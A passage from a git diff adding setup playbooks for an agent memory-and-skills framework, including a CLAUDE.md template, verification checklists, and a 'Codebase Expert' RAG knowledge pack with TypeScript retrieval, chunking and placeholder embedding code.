5.2: Create Root CLAUDE.md + +Create `CLAUDE.md` in agent root directory: + +```markdown +# <Agent Name>: <Persona> + +## Your Name + +Your name is **<Persona>**. You are the <agent type> agent for <Organization>. + +## Your Mission + +<one-sentence mission statement> + +## Your Role + +<2-3 sentence role description> + +## Core Responsibilities + +### Primary Functions +- +- +- + +### Supporting Tasks +- +- + +## System Architecture + +You operate within the Claude Cognitive Infrastructure: + +- **Skills Framework** (`.claude/skills/`): Modular domain expertise +- **Memory System** (`.claude/MEMORY/`): Persistent knowledge +- **Hook System** (`.claude/hooks/`): Event-driven automation +- **Configuration** (`.claude/config/`): Runtime settings + +## Memory Management + +**CRITICAL:** Update work status after EVERY conversation turn to maintain continuity.
+ +- Read relevant memories before starting work +- Update memories after significant interactions +- Keep work status current at `.claude/MEMORY/State/` + +## Organization Context + + + +--- + +*Claude Cognitive Infrastructure v1.1.0* +``` + +--- + +## Part 6: Gitignore Configuration + +### Step 6.1: Create/Update .gitignore + +Add to `.gitignore` in agent root: + +```gitignore +# Claude Cognitive Infrastructure - Private Data +.claude/MEMORY/raw-outputs/ +.claude/MEMORY/sessions/ +.claude/MEMORY/security/ +.claude/MEMORY/State/ +.claude/MEMORY/Signals/ +.claude/MEMORY/Work/ +.claude/skills/CORE/USER/ + +# Keep structure but ignore contents +!.claude/MEMORY/.gitkeep +!.claude/MEMORY/State/.gitkeep +``` + +### Step 6.2: Create .gitkeep Files + +```bash +touch .claude/MEMORY/.gitkeep +touch .claude/MEMORY/State/.gitkeep +touch .claude/MEMORY/Signals/.gitkeep +touch .claude/MEMORY/Work/.gitkeep +touch .claude/MEMORY/Learning/.gitkeep +``` + +--- + +## Post-Implementation Checklist + +After all files are created: + +- [ ] Verify all directories exist +- [ ] Validate JSON syntax in settings.json +- [ ] Validate YAML syntax in config.yaml +- [ ] Ensure hook files are executable (`chmod +x .claude/hooks/*.ts`) +- [ ] Test security validator: `echo '{"tool_name":"Bash","tool_input":{"command":"ls"}}' | bun run .claude/hooks/security-validator.ts` +- [ ] Verify CLAUDE.md has been customized with agent identity +- [ ] Confirm .gitignore excludes sensitive data + +--- + +## Next Phase + +Proceed to **5_VERIFY.md** to verify the installation. diff --git a/Setup/Claude-Cognitive-Infrastructure/5_VERIFY.md b/Setup/Claude-Cognitive-Infrastructure/5_VERIFY.md new file mode 100644 index 0000000..feb24ba --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/5_VERIFY.md @@ -0,0 +1,143 @@ +# Phase 5: Verify Installation + +## Objective + +Verify the Claude Cognitive Infrastructure is correctly installed and functional. + +## Verification Checklist + +### 1. 
Directory Structure + +Verify all directories exist: + +- [ ] `.claude/` directory exists +- [ ] `.claude/config/` exists +- [ ] `.claude/skills/CORE/` exists +- [ ] `.claude/context/` exists +- [ ] `.claude/context/memory/` exists +- [ ] `.claude/hooks/` exists +- [ ] `.claude/agents/` exists +- [ ] `.claude/scripts/` exists +- [ ] `.claude/examples/` exists + +### 2. Core Files + +Verify essential files are in place: + +- [ ] `CLAUDE.md` exists in agent root +- [ ] `.claude/VERSION` contains "1.1.0" +- [ ] `.claude/settings.json` exists and is valid JSON +- [ ] `.claude/config/config.yaml` exists and is valid YAML +- [ ] `.claude/skills/CORE/SKILL.md` exists + +### 3. Memory System + +Verify memory files: + +- [ ] `.claude/context/memory/learnings.md` exists +- [ ] `.claude/context/memory/user_preferences.md` exists +- [ ] `.claude/context/memory/work_status.md` exists + +### 4. Content Validation + +#### CLAUDE.md +- [ ] Contains agent name +- [ ] Contains persona name +- [ ] Contains mission statement +- [ ] Contains role description +- [ ] Contains memory management instructions +- [ ] Contains "Update work_status.md after EVERY conversation turn" + +#### settings.json +- [ ] Valid JSON syntax +- [ ] Contains hooks configuration +- [ ] Contains permissions + +#### CORE/SKILL.md +- [ ] Valid YAML frontmatter +- [ ] Contains triggers +- [ ] Has priority of 100 +- [ ] Has context_budget defined + +## Functional Testing + +### Test 1: Identity Check +Ask the agent: "Who are you?" + +**Expected**: Agent should respond with its persona name, role, and purpose. + +### Test 2: Memory Access +Ask the agent: "What's in your work status?" + +**Expected**: Agent should read and report from `.claude/context/memory/work_status.md`. + +### Test 3: Memory Update +Ask the agent to add a task to work status. + +**Expected**: Agent should update `.claude/context/memory/work_status.md`. + +### Test 4: Skill Activation +Ask: "What can you do?" 
+ +**Expected**: Agent should describe its capabilities based on CORE skill. + +## Success Criteria + +Installation is successful when: + +1. All directories exist +2. All core files are present +3. Files contain valid content +4. Agent responds correctly to identity queries +5. Memory read/write operations work + +## Troubleshooting + +### Missing Directories +Re-run the mkdir command from Step 1 of implementation. + +### Invalid JSON/YAML +Check for syntax errors: +- Trailing commas in JSON +- Incorrect indentation in YAML +- Missing quotes around strings + +### Identity Not Loading +- Verify CLAUDE.md is in agent root (not in .claude/) +- Check file permissions +- Ensure no syntax errors in markdown + +### Memory Not Updating +- Verify memory directory exists +- Check file permissions +- Ensure files are not locked + +## Post-Verification + +Once verification passes: + +1. **Document completion** - Note installation date in config.yaml +2. **Test knowledge packs** - Ready to install additional knowledge packs +3. **Customize as needed** - Add agent-specific context and skills + +## Installation Complete + +The Claude Cognitive Infrastructure is now installed and operational. + +The agent has: +- Persistent memory across sessions +- Modular skill system +- Structured context management +- Event-driven hooks capability +- Complete identity configuration + +### Next Steps + +1. Run **Knowledge Pack** playbooks to add domain expertise +2. Customize CLAUDE.md with additional instructions +3. Add custom hooks for automation +4. 
Begin using the agent + +--- + +*Claude Cognitive Infrastructure v1.1.0* diff --git a/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/0_INITIALIZE.md b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/0_INITIALIZE.md new file mode 100644 index 0000000..4cb454f --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/0_INITIALIZE.md @@ -0,0 +1,41 @@ +# Phase 0: Initialize + +## Objective + +Validate prerequisites for installing the Codebase Expert knowledge pack. + +## Prerequisites Checklist + +### 1. Claude Cognitive Infrastructure + +Verify the agent has Claude Cognitive Infrastructure installed: + +- [ ] `.claude/` directory exists +- [ ] `.claude/skills/` directory exists +- [ ] `.claude/context/` directory exists +- [ ] `.claude/VERSION` contains valid version + +### 2. Codebase Presence + +Verify there is a codebase to analyze: + +- [ ] Source code files exist in the agent directory +- [ ] At least one recognized language present (js, ts, py, go, etc.) + +### 3. _Core Utilities + +Verify Knowledge Packs _Core is available: + +- [ ] _Core utilities are accessible +- [ ] RAG retrieval hook can be installed + +## Validation Steps + +1. Check for `.claude/` directory +2. Scan for source code files +3. Identify primary languages +4. Verify _Core availability + +## Next Phase + +Once prerequisites are validated, proceed to **1_ANALYZE.md**. diff --git a/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/1_ANALYZE.md b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/1_ANALYZE.md new file mode 100644 index 0000000..2672750 --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/1_ANALYZE.md @@ -0,0 +1,59 @@ +# Phase 1: Analyze Codebase + +## Objective + +Analyze the codebase structure to plan optimal indexing strategy. + +## Analysis Tasks + +### 1. 
Directory Structure + +Map the codebase structure: + +- [ ] Identify source directories (src/, lib/, etc.) +- [ ] Locate test directories +- [ ] Find configuration files +- [ ] Note documentation locations + +### 2. Language Detection + +Identify languages and frameworks: + +| Extension | Language | Framework | +|-----------|----------|-----------| +| .ts, .tsx | TypeScript | | +| .js, .jsx | JavaScript | | +| .py | Python | | +| .go | Go | | +| .rs | Rust | | +| .java | Java | | + +### 3. File Inventory + +Count files by type: + +- Source files: ___ +- Test files: ___ +- Config files: ___ +- Documentation: ___ + +### 4. Key Entry Points + +Identify important files: + +- [ ] Main entry point(s) +- [ ] Package/module definition +- [ ] Primary exports +- [ ] API definitions + +## Analysis Outputs + +Document: +1. **Languages** - Primary and secondary languages +2. **Structure** - Directory organization pattern +3. **Size** - Total files and estimated tokens +4. **Entry Points** - Key files for understanding + +## Next Phase + +Proceed to **2_PLAN_STRUCTURE.md** to plan indexing structure. diff --git a/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/2_PLAN_STRUCTURE.md b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/2_PLAN_STRUCTURE.md new file mode 100644 index 0000000..1283010 --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/2_PLAN_STRUCTURE.md @@ -0,0 +1,69 @@ +# Phase 2: Plan Structure + +## Objective + +Plan the indexing and installation structure for the Codebase Expert pack. + +## Installation Structure + +``` +.claude/ +├── skills/ +│ └── Codebase-Expert/ +│ └── SKILL.md # Skill definition +├── context/ +│ └── knowledge/ +│ └── codebase/ +│ └── index.json # Codebase index metadata +└── config/ + └── knowledge-packs.yaml # Registry entry +``` + +## Indexing Strategy + +### Files to Index + +Include: +- Source code files (.ts, .js, .py, .go, etc.) 
+- Configuration files (package.json, tsconfig.json, etc.) +- Documentation (.md files in docs/) + +Exclude: +- node_modules/ +- .git/ +- Build outputs (dist/, build/) +- Binary files +- Large generated files + +### Chunking Strategy + +- **Code files**: Chunk by function/class +- **Config files**: Keep whole +- **Documentation**: Chunk by section + +### Embedding Plan + +- Generate embeddings for each chunk +- Store in vector store for semantic search +- Index by file path and content type + +## Skill Configuration + +```yaml +name: Codebase-Expert +version: 1.0.0 +priority: 80 +triggers: + - code + - codebase + - architecture + - implementation + - function + - class + - module +context_budget: 8000 +``` + +## Next Phase + +Proceed to **3_EVALUATE.md** to evaluate the plan. diff --git a/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/3_EVALUATE.md b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/3_EVALUATE.md new file mode 100644 index 0000000..48e7756 --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/3_EVALUATE.md @@ -0,0 +1,50 @@ +# Phase 3: Evaluate Plan + +## Objective + +Evaluate the indexing plan for completeness and feasibility. + +## Evaluation Checklist + +### 1. Coverage + +- [ ] All relevant source directories included +- [ ] Important file types identified +- [ ] Exclusions are appropriate +- [ ] No sensitive files will be indexed + +### 2. Scale + +- [ ] File count is manageable +- [ ] Estimated token count within limits +- [ ] Chunking strategy appropriate for size + +### 3. Quality + +- [ ] Chunking preserves semantic meaning +- [ ] Key files prioritized +- [ ] Entry points well-covered + +### 4. 
Performance + +- [ ] Indexing can complete in reasonable time +- [ ] Vector store size is acceptable +- [ ] Search latency will be acceptable + +## Risk Assessment + +| Risk | Likelihood | Mitigation | +|------|------------|------------| +| Too many files | Medium | Apply stricter exclusions | +| Poor chunk quality | Low | Adjust chunking strategy | +| Large embeddings | Low | Reduce chunk size | + +## Approval Criteria + +- [ ] Coverage is comprehensive +- [ ] Scale is manageable +- [ ] No blocking issues + +## Next Phase + +If evaluation passes, proceed to **4_IMPLEMENT.md**. diff --git a/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/4_IMPLEMENT.md b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/4_IMPLEMENT.md new file mode 100644 index 0000000..c91f427 --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/4_IMPLEMENT.md @@ -0,0 +1,150 @@ +# Phase 4: Implement Installation + +## Objective + +Execute the Codebase Expert knowledge pack installation. + +## Prerequisites + +> **Important**: Before proceeding, you must configure an embedding provider. The default `embeddings.ts` contains placeholder code that returns random vectors. See the assets folder for the file to configure. + +### Embedding Provider Options + +1. **OpenAI** (recommended): Set `OPENAI_API_KEY` environment variable +2. **Ollama** (local): Run `ollama pull nomic-embed-text` +3. 
**Other**: Modify `{{AUTORUN_FOLDER}}/assets/lib/embeddings.ts` for your provider
+
+## Implementation Steps
+
+### Step 1: Create Skill Directory
+
+```bash
+mkdir -p .claude/skills/Codebase-Expert
+```
+
+### Step 2: Install SKILL.md
+
+Copy the skill template from `{{AUTORUN_FOLDER}}/assets/templates/skills/Codebase-Expert/SKILL.md` to:
+`.claude/skills/Codebase-Expert/SKILL.md`
+
+### Step 3: Create Knowledge Directory
+
+```bash
+mkdir -p .claude/context/knowledge/codebase
+```
+
+### Step 4: Configure Embedding Provider
+
+Before indexing, update `{{AUTORUN_FOLDER}}/assets/lib/embeddings.ts` with your chosen provider:
+
+**For OpenAI:**
+```typescript
+import OpenAI from 'openai';
+const openai = new OpenAI({ apiKey: process.env.OPENAI_API_KEY });
+
+export async function generateEmbedding(text: string): Promise<number[]> {
+  const response = await openai.embeddings.create({
+    model: 'text-embedding-3-small',
+    input: text,
+  });
+  return response.data[0].embedding;
+}
+```
+
+**For Ollama (local):**
+```typescript
+export async function generateEmbedding(text: string): Promise<number[]> {
+  const response = await fetch('http://localhost:11434/api/embeddings', {
+    method: 'POST',
+    body: JSON.stringify({ model: 'nomic-embed-text', prompt: text }),
+  });
+  return (await response.json()).embedding;
+}
+```
+
+### Step 5: Index Codebase
+
+For each source file:
+1. Read file content
+2. Chunk appropriately (by function/class for code)
+3. Generate embeddings using your configured provider
+4. Store in vector store
+
+**Example indexing script:**
+
+Copy the library files from `{{AUTORUN_FOLDER}}/assets/lib/` to your hooks directory, then use:
+
+```typescript
+import { smartChunk } from './.claude/hooks/lib/chunking';
+import { generateEmbedding } from './.claude/hooks/lib/embeddings';
+import { VectorStore } from './.claude/hooks/lib/vector-store';
+
+// VectorStore's constructor is private; stores are obtained per pack id.
+const store = VectorStore.forPack('codebase-expert');
+
+// sourceFiles: the file list gathered during Phase 1 analysis
+for (const file of sourceFiles) {
+  const chunks = smartChunk(file.content);
+  for (const chunk of chunks) {
+    const embedding = await generateEmbedding(chunk.content);
+    store.add({
+      id: `${file.path}#${chunk.index}`,
+      content: chunk.content,
+      embedding,
+      metadata: { source: file.path },
+    });
+  }
+}
+```
+
+### Step 6: Create Index Metadata
+
+Create `.claude/context/knowledge/codebase/index.json`:
+
+```json
+{
+  "created": "",
+  "files_indexed": 0,
+  "chunks": 0,
+  "languages": ["", ""],
+  "embedding_provider": "",
+  "embedding_model": "",
+  "last_updated": ""
+}
+```
+
+Fill in the counts, languages, provider, and timestamps recorded during indexing.
+
+### Step 7: Update Registry
+
+Add to `.claude/config/knowledge-packs.yaml`:
+
+```yaml
+- id: codebase-expert
+  name: "Codebase Expert"
+  installed: ""
+  version: "1.0.0"
+  embedding_provider: ""
+  sources:
+    - path: ".claude/context/knowledge/codebase/"
+      type: "directory"
+  skill_path: ".claude/skills/Codebase-Expert/SKILL.md"
+```
+
+### Step 8: Configure RAG Hook (Optional)
+
+The RAG retrieval hook in `{{AUTORUN_FOLDER}}/assets/hooks/rag-retrieval.ts` is a reference implementation. Integration options:
+
+1. **Manual**: Query the vector store directly when you need code context
+2. **MCP Server**: Implement as an MCP server for Claude integration
+3.
**Wrapper Script**: Run as preprocessing before Claude sessions + +## Post-Implementation + +- [ ] Verify all files created +- [ ] Test embedding generation with a sample query +- [ ] Verify vector store contains indexed chunks +- [ ] Test semantic search returns relevant results + +## Troubleshooting + +| Issue | Solution | +|-------|----------| +| Random/irrelevant results | Embedding provider not configured (still using placeholder) | +| API errors | Check API key and network connectivity | +| Empty results | Verify indexing completed and vector store has data | + +## Next Phase + +Proceed to **5_VERIFY.md** to verify installation. diff --git a/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/5_VERIFY.md b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/5_VERIFY.md new file mode 100644 index 0000000..6245f2f --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/5_VERIFY.md @@ -0,0 +1,76 @@ +# Phase 5: Verify Installation + +## Objective + +Verify the Codebase Expert knowledge pack is correctly installed. + +## Verification Checklist + +### 1. Files Present + +- [ ] `.claude/skills/Codebase-Expert/SKILL.md` exists +- [ ] `.claude/context/knowledge/codebase/` exists +- [ ] `.claude/context/knowledge/codebase/index.json` exists + +### 2. Skill Configuration + +- [ ] SKILL.md has valid frontmatter +- [ ] Triggers include: code, codebase, architecture +- [ ] Priority is 80 +- [ ] context_budget is defined + +### 3. Index Quality + +- [ ] Files were indexed +- [ ] Chunk count is reasonable +- [ ] Languages detected correctly + +### 4. Registry Entry + +- [ ] Pack is registered in knowledge-packs.yaml +- [ ] Sources path is correct +- [ ] Skill path is correct + +## Functional Testing + +### Test 1: Code Search +Ask: "Where is the main entry point?" + +**Expected**: Agent finds and references the main entry file. + +### Test 2: Architecture +Ask: "How is the project structured?" 
+ +**Expected**: Agent describes directory structure and organization. + +### Test 3: Functionality +Ask: "How does [specific feature] work?" + +**Expected**: Agent retrieves and explains relevant code. + +## Success Criteria + +- All files present +- Index populated +- Semantic search working +- Skill activates on triggers + +## Troubleshooting + +### No Search Results +- Verify files were indexed +- Check embedding generation +- Confirm vector store populated + +### Wrong Results +- Review chunking strategy +- Check file exclusions +- Verify language detection + +## Installation Complete + +The Codebase Expert knowledge pack is now installed. + +--- + +*Codebase Expert Knowledge Pack v1.0.0* diff --git a/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/README.md b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/README.md new file mode 100644 index 0000000..9a00f45 --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/README.md @@ -0,0 +1,64 @@ +# Codebase Expert Knowledge Pack + +Installs the Codebase Expert knowledge pack, enabling RAG-powered code understanding with semantic search across the codebase. + +## What This Pack Does + +The Codebase Expert pack gives your agent deep understanding of your codebase: + +- **Semantic Code Search** - Find relevant code by meaning, not just keywords +- **Architecture Understanding** - Understand how components connect +- **Pattern Recognition** - Identify common patterns and conventions +- **Context-Aware Assistance** - Get help that understands your specific codebase + +## Prerequisites + +- Claude Cognitive Infrastructure must be installed first +- A codebase to analyze (the agent's working directory) + +## Installation + +Run this playbook after Claude Cognitive Infrastructure is set up. The playbook will: + +1. Analyze the codebase structure +2. Index code files for semantic search +3. Install the Codebase-Expert skill +4. 
Configure RAG retrieval hooks + +## After Installation + +The agent will automatically: +- Retrieve relevant code context when answering questions +- Understand the codebase architecture +- Reference specific files and functions in responses + +## Skill Triggers + +The Codebase-Expert skill activates on queries about: +- Code structure and architecture +- Finding specific functionality +- Understanding how components work +- Debugging and troubleshooting + +## Assets + +This playbook includes the following assets in the `assets/` folder: + +| Asset | Purpose | +|-------|---------| +| `hooks/rag-retrieval.ts` | Pre-tool hook for context injection | +| `lib/embeddings.ts` | Text embedding generation (placeholder - configure provider) | +| `lib/vector-store.ts` | Vector storage for semantic search | +| `lib/chunking.ts` | Document chunking strategies | +| `lib/registry.ts` | Knowledge pack registration | +| `templates/skills/Codebase-Expert/SKILL.md` | Skill definition template | + +Reference assets using `{{AUTORUN_FOLDER}}/assets/` in playbook documents. + +### Configuration Required + +The `embeddings.ts` file contains a **placeholder implementation**. You must configure an actual embedding provider (OpenAI, Ollama, etc.) for semantic search to work. See the file comments for configuration examples. + +--- + +*Codebase Expert Knowledge Pack v1.0.0* diff --git a/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/hooks/rag-retrieval.ts b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/hooks/rag-retrieval.ts new file mode 100644 index 0000000..3800894 --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/hooks/rag-retrieval.ts @@ -0,0 +1,128 @@ +/** + * RAG Retrieval Hook + * + * Pre-tool hook that retrieves relevant context from knowledge packs + * and injects it into the conversation before tool execution. 
+ */
+
+import { VectorStore } from '../lib/vector-store';
+import { Registry } from '../lib/registry';
+import { generateEmbedding } from '../lib/embeddings';
+
+interface HookContext {
+  toolName: string;
+  toolInput: Record<string, unknown>;
+  conversationHistory: Array<{ role: string; content: string }>;
+}
+
+interface RetrievalResult {
+  content: string;
+  source: string;
+  score: number;
+}
+
+/**
+ * Configuration for the RAG retrieval hook
+ */
+const config = {
+  maxResults: 5,
+  minScore: 0.7,
+  contextBudget: 4000,
+};
+
+/**
+ * Extract the current query/intent from the conversation
+ */
+function extractQuery(context: HookContext): string {
+  const lastUserMessage = context.conversationHistory
+    .filter(m => m.role === 'user')
+    .pop();
+
+  return lastUserMessage?.content || '';
+}
+
+/**
+ * Retrieve relevant context from registered knowledge packs
+ */
+async function retrieveContext(query: string): Promise<RetrievalResult[]> {
+  const registry = Registry.getInstance();
+  const activePacks = registry.getActivePacks();
+
+  if (activePacks.length === 0) {
+    return [];
+  }
+
+  const queryEmbedding = await generateEmbedding(query);
+  const results: RetrievalResult[] = [];
+
+  for (const pack of activePacks) {
+    const vectorStore = VectorStore.forPack(pack.id);
+    const packResults = await vectorStore.search(queryEmbedding, {
+      limit: config.maxResults,
+      minScore: config.minScore,
+    });
+
+    results.push(...packResults.map(r => ({
+      content: r.content,
+      source: `${pack.name}: ${r.metadata?.source || 'unknown'}`,
+      score: r.score,
+    })));
+  }
+
+  // Sort by score and limit to budget
+  return results
+    .sort((a, b) => b.score - a.score)
+    .slice(0, config.maxResults);
+}
+
+/**
+ * Format retrieved context for injection
+ */
+function formatContext(results: RetrievalResult[]): string {
+  if (results.length === 0) {
+    return '';
+  }
+
+  const contextParts = results.map(r =>
+    `[Source: ${r.source}]\n${r.content}`
+  );
+
+  return `
+
+The following context was retrieved from knowledge packs and may be relevant:
+
+${contextParts.join('\n\n---\n\n')}
+
+`;
+}
+
+/**
+ * Main hook function - called before tool execution
+ */
+export async function preToolCall(context: HookContext): Promise<string | null> {
+  // Only inject context for certain tools
+  const contextualTools = ['Read', 'Write', 'Edit', 'Bash'];
+
+  if (!contextualTools.includes(context.toolName)) {
+    return null;
+  }
+
+  try {
+    const query = extractQuery(context);
+    if (!query) {
+      return null;
+    }
+
+    const results = await retrieveContext(query);
+    if (results.length === 0) {
+      return null;
+    }
+
+    return formatContext(results);
+  } catch (error) {
+    console.error('RAG retrieval error:', error);
+    return null;
+  }
+}
+
+export default { preToolCall };
diff --git a/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/lib/chunking.ts b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/lib/chunking.ts
new file mode 100644
index 0000000..5446af2
--- /dev/null
+++ b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/lib/chunking.ts
@@ -0,0 +1,199 @@
+/**
+ * Document Chunking
+ *
+ * Strategies for splitting documents into chunks for embedding.
+ */ + +interface Chunk { + content: string; + index: number; + metadata?: { + startLine?: number; + endLine?: number; + source?: string; + }; +} + +interface ChunkingOptions { + maxChunkSize?: number; + overlap?: number; + preserveParagraphs?: boolean; +} + +const defaultOptions: ChunkingOptions = { + maxChunkSize: 1000, + overlap: 100, + preserveParagraphs: true, +}; + +/** + * Split text into chunks by character count + */ +export function chunkBySize( + text: string, + options: ChunkingOptions = {} +): Chunk[] { + const { maxChunkSize, overlap } = { ...defaultOptions, ...options }; + const chunks: Chunk[] = []; + + let start = 0; + let index = 0; + + while (start < text.length) { + const end = Math.min(start + maxChunkSize!, text.length); + + chunks.push({ + content: text.slice(start, end), + index, + }); + + start = end - overlap!; + index++; + } + + return chunks; +} + +/** + * Split text into chunks by paragraph + */ +export function chunkByParagraph( + text: string, + options: ChunkingOptions = {} +): Chunk[] { + const { maxChunkSize } = { ...defaultOptions, ...options }; + const paragraphs = text.split(/\n\n+/); + const chunks: Chunk[] = []; + + let currentChunk = ''; + let index = 0; + + for (const paragraph of paragraphs) { + if (currentChunk.length + paragraph.length > maxChunkSize!) { + if (currentChunk) { + chunks.push({ + content: currentChunk.trim(), + index, + }); + index++; + } + currentChunk = paragraph; + } else { + currentChunk += (currentChunk ? 
'\n\n' : '') + paragraph;
+    }
+  }
+
+  if (currentChunk) {
+    chunks.push({
+      content: currentChunk.trim(),
+      index,
+    });
+  }
+
+  return chunks;
+}
+
+/**
+ * Split code into chunks by function/class
+ */
+export function chunkByCodeBlock(
+  code: string,
+  options: ChunkingOptions = {}
+): Chunk[] {
+  const { maxChunkSize } = { ...defaultOptions, ...options };
+  const chunks: Chunk[] = [];
+
+  // Simple regex-based splitting for common patterns.
+  // No `g` flag: a global regex keeps lastIndex state across .test()
+  // calls and would silently skip alternating block starts.
+  const patterns = [
+    /^(export\s+)?(async\s+)?function\s+\w+/,
+    /^(export\s+)?class\s+\w+/,
+    /^(export\s+)?const\s+\w+\s*=/,
+  ];
+
+  const lines = code.split('\n');
+  let currentChunk: string[] = [];
+  let startLine = 0;
+  let index = 0;
+
+  for (let i = 0; i < lines.length; i++) {
+    const line = lines[i];
+    const isBlockStart = patterns.some(p => p.test(line));
+
+    if (isBlockStart && currentChunk.length > 0) {
+      const content = currentChunk.join('\n');
+      if (content.trim()) {
+        chunks.push({
+          content,
+          index,
+          metadata: { startLine, endLine: i - 1 },
+        });
+        index++;
+      }
+      currentChunk = [];
+      startLine = i;
+    }
+
+    currentChunk.push(line);
+
+    // Force split if chunk is too large
+    if (currentChunk.join('\n').length > maxChunkSize!)
{ + chunks.push({ + content: currentChunk.join('\n'), + index, + metadata: { startLine, endLine: i }, + }); + index++; + currentChunk = []; + startLine = i + 1; + } + } + + if (currentChunk.length > 0) { + const content = currentChunk.join('\n'); + if (content.trim()) { + chunks.push({ + content, + index, + metadata: { startLine, endLine: lines.length - 1 }, + }); + } + } + + return chunks; +} + +/** + * Smart chunking that detects content type + */ +export function smartChunk( + content: string, + options: ChunkingOptions = {} +): Chunk[] { + // Detect if content looks like code + const codeIndicators = [ + /^import\s+/m, + /^export\s+/m, + /function\s+\w+\s*\(/, + /class\s+\w+/, + /const\s+\w+\s*=/, + ]; + + const isCode = codeIndicators.some(p => p.test(content)); + + if (isCode) { + return chunkByCodeBlock(content, options); + } + + if (options.preserveParagraphs) { + return chunkByParagraph(content, options); + } + + return chunkBySize(content, options); +} + +export default { + chunkBySize, + chunkByParagraph, + chunkByCodeBlock, + smartChunk, +}; diff --git a/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/lib/embeddings.ts b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/lib/embeddings.ts new file mode 100644 index 0000000..a4a706d --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/lib/embeddings.ts @@ -0,0 +1,120 @@ +/** + * Embeddings Generation + * + * Generates text embeddings for semantic search capabilities. + * + * ⚠️ CONFIGURATION REQUIRED ⚠️ + * + * This file contains a PLACEHOLDER implementation that returns random vectors. 
+ * You MUST replace generateEmbedding() with a real embedding provider:
+ *
+ * Option 1: OpenAI (recommended)
+ * ```
+ * import OpenAI from 'openai';
+ * const openai = new OpenAI({ apiKey: process.env.OPENAI_API_KEY });
+ *
+ * export async function generateEmbedding(text: string): Promise<number[]> {
+ *   const response = await openai.embeddings.create({
+ *     model: 'text-embedding-3-small',
+ *     input: text,
+ *   });
+ *   return response.data[0].embedding;
+ * }
+ * ```
+ *
+ * Option 2: Ollama (local)
+ * ```
+ * export async function generateEmbedding(text: string): Promise<number[]> {
+ *   const response = await fetch('http://localhost:11434/api/embeddings', {
+ *     method: 'POST',
+ *     body: JSON.stringify({ model: 'nomic-embed-text', prompt: text }),
+ *   });
+ *   return (await response.json()).embedding;
+ * }
+ * ```
+ *
+ * See _Core/README.md for more options.
+ */
+
+interface EmbeddingConfig {
+  model: string;
+  dimensions: number;
+  batchSize: number;
+}
+
+const defaultConfig: EmbeddingConfig = {
+  model: 'text-embedding-3-small',
+  dimensions: 1536,
+  batchSize: 100,
+};
+
+/**
+ * Generate embedding for a single text
+ *
+ * ⚠️ PLACEHOLDER - Returns random vectors!
+ * Replace this function with a real embedding provider.
+ */
+export async function generateEmbedding(
+  text: string,
+  config: Partial<EmbeddingConfig> = {}
+): Promise<number[]> {
+  const finalConfig = { ...defaultConfig, ...config };
+
+  // ⚠️ PLACEHOLDER IMPLEMENTATION - REPLACE ME!
+  // This returns random vectors which will NOT provide meaningful semantic search.
+  // See the file header comments for implementation examples.
+  console.warn(
+    '⚠️ embeddings.ts: Using placeholder implementation. ' +
+      'Configure a real embedding provider for semantic search to work.'
+  );
+  return new Array(finalConfig.dimensions).fill(0).map(() => Math.random());
+}
+
+/**
+ * Generate embeddings for multiple texts
+ */
+export async function generateEmbeddings(
+  texts: string[],
+  config: Partial<EmbeddingConfig> = {}
+): Promise<number[][]> {
+  const finalConfig = { ...defaultConfig, ...config };
+  const results: number[][] = [];
+
+  // Process in batches
+  for (let i = 0; i < texts.length; i += finalConfig.batchSize) {
+    const batch = texts.slice(i, i + finalConfig.batchSize);
+    const batchResults = await Promise.all(
+      batch.map(text => generateEmbedding(text, config))
+    );
+    results.push(...batchResults);
+  }
+
+  return results;
+}
+
+/**
+ * Calculate cosine similarity between two embeddings
+ */
+export function cosineSimilarity(a: number[], b: number[]): number {
+  if (a.length !== b.length) {
+    throw new Error('Embeddings must have same dimensions');
+  }
+
+  let dotProduct = 0;
+  let normA = 0;
+  let normB = 0;
+
+  for (let i = 0; i < a.length; i++) {
+    dotProduct += a[i] * b[i];
+    normA += a[i] * a[i];
+    normB += b[i] * b[i];
+  }
+
+  return dotProduct / (Math.sqrt(normA) * Math.sqrt(normB));
}
+
+export default {
+  generateEmbedding,
